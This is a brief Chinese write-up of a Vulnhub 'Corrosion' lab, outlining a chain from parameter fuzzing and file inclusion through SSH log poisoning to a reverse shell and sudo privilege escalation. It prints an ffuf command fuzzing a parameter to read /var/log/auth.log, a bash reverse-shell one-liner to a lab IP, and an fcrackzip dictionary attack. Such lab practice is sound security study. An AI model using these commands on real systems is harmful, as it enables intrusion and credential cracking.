Vulnhub——Corrosion渗透

参考

https://blog.csdn.net/hxync/article/details/119705495

https://www.freebuf.com/articles/web/284705.html

渗透思路

主机发现 => 主机扫描 => 目录扫描 => FUZZ参数 => 文件包含漏洞 => SSH 日志投毒 => 反弹shell => 内网信息搜集 => SUDO滥用提权

1.学到知识点

1.ffuf

该工具用途广泛,可用于多种用途。一些用途:
? 目录发现,可选择在 URL 中的任何位置进行模糊测试。
? 子域名发现
? 使用各种 HTTP 方法进行模糊测试。

ffuf -c -w /usr/share/wordlists/dirb/big.txt -u 'http://192.168.175.145/blog-post/archives/randylogs.php?FUZZ=/var/log/auth.log' -fs 0

对GET 参数模糊测试

2.反弹shell

bash -c 'bash -i >& /dev/tcp/192.168.1.23/1234 0>&1'

3.fcrackzip

Fcrackzip是一款专门破解zip类型压缩文件密码的工具,工具小巧方便、破解速度快,能使用字典和指定字符集破解,适用于linux、mac osx 系统。

fcrackzip -D -p /usr/share/wordlists/rockyou.txt -u user_backup.zip

爆破zip文件

靶机渗透权限提升文件包含漏洞

相关

DC3靶机渗透

DC3靶机渗透

31:WEB漏洞-文件操作之文件包含漏洞全解

centos 7/8 系统内核升级 4.19->5.16 Linux 内核权限提升漏洞(CVE-2022-0847)

Hikvision iVMS 4200 /index.php 本地文件包含漏洞复现

【web安全】文件包含漏洞

标签